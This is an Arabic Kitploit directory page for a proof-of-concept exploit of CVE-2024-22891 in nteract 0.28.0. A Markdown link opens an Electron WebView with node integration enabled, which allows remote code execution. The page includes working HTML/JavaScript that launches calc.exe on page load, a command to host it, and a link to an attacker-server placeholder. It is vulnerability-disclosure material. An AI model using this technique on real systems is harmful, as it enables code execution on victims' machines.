Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-22891 — nteract 0.28.0 إعادة توجيه مفتوحة لاستغلال تنفيذ التعليمات البرمجية عن بُعد | Kitploit
أدوات/GitHubGitHub/eqstlab/cve-2024-22891
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubeqstlab/cve-2024-22891

CVE-2024-22891

nteract 0.28.0 إعادة توجيه مفتوحة لاستغلال تنفيذ التعليمات البرمجية عن بُعد

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم لـ Nteract

إثبات مفهوم لثغرة CVE-2024-22891.

يتيح nteract 0.28.0 عرض Electron WebView عبر رابط Markdown، مما يؤدي إلى تنفيذ تعليمات برمجية عن بُعد.

يحتوي هذا المستودع على تطبيق ضعيف كمثال واستغلال إثبات المفهوم (POC) له. كإثبات مفهوم، يوجد ملف Python يقوم بأتمتة العملية.

1. نظرة عامة على الثغرة:

  • موضوع الثغرة: تنفيذ تعليمات برمجية عن بُعد عبر رابط Markdown
  • نوع الثغرة: أخرى: إعادة توجيه مفتوحة
  • مظهر المشكلة: Electron WebView
  • المكون المتأثر: markdown
  • نوع الهجوم: تنفيذ تعليمات برمجية عن بُعد
  • نواقل الهجوم: لاستغلال الثغرة، يجب على شخص النقر على الرابط أو الوصول إلى رابط المشروع المشترك.
  • رقم CVE المحجوز: CVE-2024-22891

2. سبب الثغرة:

  • يسمح nteract 0.28.0 بعرض Electron WebView عبر رابط Markdown، مما ينتج عنه تنفيذ تعليمات برمجية عن بُعد (لأن nodeIntegration في webPreferences مضبوط على true).

  • شرح الاستغلال

    • عند إنشاء روابط عبر MarkDown داخل التطبيق، يُنشئ WebView عبر Electron، مما يسمح بالوصول الخارجي إلى الرابط. وبالتالي، يمكن للمهاجم تحقيق تنفيذ تعليمات برمجية عن بُعد (RCE) عن طريق الاتصال بالرابط المؤدي إلى خادم المهاجم.

إثبات المفهوم (POC)

الخطوة 1) يقوم المهاجم بإنشاء خادم لشفرة المصدر لتشغيل calc.exe باستخدام الدالة openExternal().

root@kitploit:~
<html>
<head>
    <title>jruru Link</title>
</head>
<body>
    <a id="jruruLink">jruru Link</a>

    <script>
         // Script function definition
        function openExternal() {
            try {
                const { shell } = require('electron');
                shell.openExternal('file:C:/Windows/System32/calc.exe');
            } catch(e) {
                alert('JRURU - External link cannot be opened.');
                console.error(e);
            }
        }
        // Automatically execute openExternal function after the page is loaded
        document.addEventListener('DOMContentLoaded', function() {
            openExternal();
        });
    </script>
</body>
</html>

ملاحظة: ※ إذا كنت ترغب في اختباره بسرعة، قم بإنشاء خادم على جهاز المهاجم باستخدام الكود التالي.

root@kitploit:~
$ python -m http.server 80

الخطوة 2) قم بتشغيل تطبيق nteract على نظام الضحية وأنشئ رابط Markdown، أو شارك ملف ipynb الخاص بالمهاجم ككود مثال. ثم، قم بتشغيل calc.exe.

root@kitploit:~
[Read This] (http://[attcker_adress]/shard_data.html)

neteract nteract2


3. معلومات إضافية

عند تنفيذ ملف .ipynb عبر مشاركة الملفات، كن حذرًا لأن الرابط قد لا يكون مرئيًا. كان من الممكن أن يكون calc.exe هذا أي حمولة ضارة محلية أو عن بُعد يمكن أن تعطي المهاجم وصولًا كاملًا إلى نظام الضحية.

تنزيل الأداة